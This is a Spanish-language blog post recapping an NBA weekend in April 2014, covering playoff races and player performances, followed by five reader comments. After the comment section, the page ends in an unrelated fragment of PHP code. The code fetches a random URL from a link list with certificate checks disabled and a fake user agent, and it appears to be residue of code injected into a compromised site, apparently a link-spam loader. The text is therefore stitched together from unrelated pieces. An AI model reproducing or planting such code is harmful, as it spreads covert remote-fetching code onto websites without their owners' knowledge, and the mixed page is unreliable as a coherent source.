Informe del fin de semana: 15 de 16

14 de April de 2014 por TheDeerHunter

Se van despejando las últimas incógnitas de la regular. Estos días hemos podido confirmar que los Hawks disputarán la postemporada en detrimento de los New York Knicks, que un año más se convierten en una de las decepciones mayúsculas de la temporada. En la otra conferencia Warriors y Mavericks también aseguran su presencia y únicamente queda esperar el pulso final entre Suns y Grizzlies para conocer los 16 equipos que se disputarán el anillo. Los cruces concretos, eso sí, no quedarán definidos hasta casi el último momento.

El viernes asistíamos a la victoría cómoda de los Heat ante los Pacers. Los Knicks cumplieron ganando en Toronto pero no contaban con la victoria de los Hawks en Brooklyn que les dejaba prácticamente fuera. Mal partido de los Nets que no demostraron estar muy por la labor de echar un cable a sus vecinos.

Los Bulls ganaban a los Pistons a pesar del 26-26 de Drummond y daban un paso de gigante para hacerse con la tercera plaza de la conferencia gracias a  las ya mencionadas derrotas de Raptors y Nets. Por su parte, los Wizards ganaban fácil en Florida y los Bobcats perdían en el Garden de Boston, quedándose atrás en el duelo particular para evitar a Pacers, si es que pudieramos considerar eso un premio viendo como están unos y otros.

En el Oeste los Suns comenzaban su particular fin de semana negro en San Antonio, desperdiciando una ventaja de 21 puntos y un casi-triple-doble de Bledsoe. La victoria permitió a los tejanos asegurarse la ventaja campo en todas las eliminatorias. Mientras, los Grizzlies, rivales por el octavo puesto de la conferencia, cumplieron ante los Sixers. Thunder y Blazers hicieron lo propio ante Pelicans y Jazz respectivamente y los Warriors cerraron su clasificación en el Staples. 

Los que no cumplieron fueron los Rockets ante los Wolves que, a buenas horas, están tremendamente duros…

“Los Wolves sin Pekovic, Love y Martin se zumban a los Rockets (sin Howard) con 51 puntos de Brewer y un 12-20 de Dieng con canasta ganadora. Lo de Brewer tremendo, canastas de todos los colores, bombitas, penetraciones, al contraataque, tiros de media distancia y hasta triple desde el medio campo.” Denise.

El sábado los Hawks daban la campanada ante los campeones y cerraban su clasificación matemáticamente. Queda feo su balance negativo en una conferencia tan sumamente débil, pero también debemos valorar el mérito que tiene haberlo hecho sin su jugador estrella la mayor parte de la campaña y por encima de rivales que deberían haber sido bastante superiores a ellos.

Dirk y Monta terminaron de amargar la vida a los Suns que se dejaron remontar por segunda noche consecutiva y a los que se les pone la situación muy cuesta arriba. Una lástima. Por su parte, los Clippers alcanzaron las 56 victorias ante los Kings  igualando así el récord de la franquicia. Bobcats y Wizards cumplieron trámite ante Sixers y Bucks.

Y ayer domingo…

“Luego está el cachondeo del liderato en el Este. Muchos palos a los Pacers pero telita también como está acabando Miami que se puede quedar sin él por palmar contra los Hawks. Con la victoria de Pacers ante los Thunder (pese al partido de Hibbert y gracias a que Oklahoma tampoco se jugaba nada) si ganan a Orlando aseguran la primera plaza.” Rumbero

Los pupilos de Vogel recuperaron sensaciones positivas y el liderato de conferencia justo antes del momento de la verdad. Bueno, las de Hibbert, con un 0 de 9, tampoco fueron muy positivas pero Stephenson consiguió un triple doble y George,West y CJ Watson, este último liderando la segunda unidad, cuajaron notables actuaciones. Los Thunder no se jugaban nada pero Durant enchufó 38 puntos para disimular.

Los Raptors se impusieron en Detroit y birlaron temporalmente la tercera plaza a Chicago, que cayeron en el Madison. Los Nets, por su parte, cumplieron ante Orlando y se aseguraron la 5ª plaza.

En el Oeste, los Grizzlies ganaron a Lakers y rozan la clasificación con los dedos. Espectacular partido, con prórroga, en Portland entre Warriors y Blazers. Curry anotó 47 puntos y asistimos a un precioso duelo final entre Klay Thompson y Wesley Matthews. Aldridge anotó la canastas decisiva e Iguodala falló la suya, aparentemente cómoda.

Finalmente sensacional duelo individual entre Love y Cousins, sin nada en juego, que terminó llevándose el segundo.

Hoy se juega el fundamental Grizzlies – Suns. Los de Jeff Hornacek han de ganar, cumplir el último día ante los Kings y esperar que los Mavs les hagan un favor y se impongan a los ositos en el último partido. Complicado pero no imposible.

Comenta

5 comentarios a esta entrada

  1. Esteban dice:
    #1

    al parece finalmente indiana se quedara con el puesto 1, tendran unos 4 o 5 partidos frente a los Hawks para descansar y recobrar la memoria, una especie de entrenamiento, luego los duros Nets o Bulls para llegar a la final con ventaja de localia y recobrando la memoria

    GO Pacers

      Citar

  2. Sancho88 dice:
    #2

    Primera vez en la historia que New York Knicks, Los Ángeles Lakers y Boston Celtics no estarán en playoffs.

    Temporada de cambio absoluta en todos los aspectos, una de las temporadas más raras que yo recuerdo. Esto lo demuestra.

    Stephenson jugador total. Crack absoluto al que le sobran tonterías de bailecitos y el espíritu ese de gilipoyas que llevan años teniendo los Pacers de pegarse con los rivales y provocar peleas. Pero en global un jugadorazo con alma del basket callejero de los 90 que ha sabido integrarse en el sistema de Vogel, que a veces podría llamarse sistema Stephenson. Los Pacers juegan como juega Stephenson. Duro en defensa, irregular en ataque, pero como saben hacer de todo salvan hasta muchos días malos en el lanzamiento. Va a ser brutal ver las finales del Este este año. A 80 puntos como mucho, protagonistas Miami, Chicago, Indiana y Brooklyn. Hostias desde semifinales y una final LeBron defendido por Stephenson y George turnándose ahí… brutal joder. A ver si tiene pelotas a superarlos este año

      Citar

  3. Nacho dice:
    #3

    Pues fin de semana clarificador, Error de los Bulls en el Madison. Ahora les toca esperar que a Toronto les ocurra lo mismo. Si no, unaprimera ronda ante los Nets, que para mí, a día de hoy son el rival más fuertedel Este (con permiso de LeBron en modo PO)
    Que Houston no se confíe porque si hoy cae ante los Spurs el partido del miércoles es contra unos Pelicans que se querrán despedir de su afición con una victoriar, y pueden perder la ventaja de campo en el único duelo que tenemos seguro.
    Lo mismo les pasa a los Warriors, que hoy se las tienen contra los Wolves y a estos según la racha les toca la victoria, si pasa eso hoy y Dallas gana a Memphis, la tensión en todo lo alto, pues los mavericks podrían alzarse con la 6ª plaza.
    Y eso sería muy bueno para el sueño de Phoenix, que debería ganar hoy a los osos.
    Como dicen en golf con la tercera jornada, hoy es la del movimiento, para situarse bien para la última o perder las opciones.

      Citar

  4. Nacho dice:
    #4

    Bueno, todos en pie para dar la ovación que se merecen los Suns

      Citar

  5. dunc dice:
    #5

    RESPECT

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>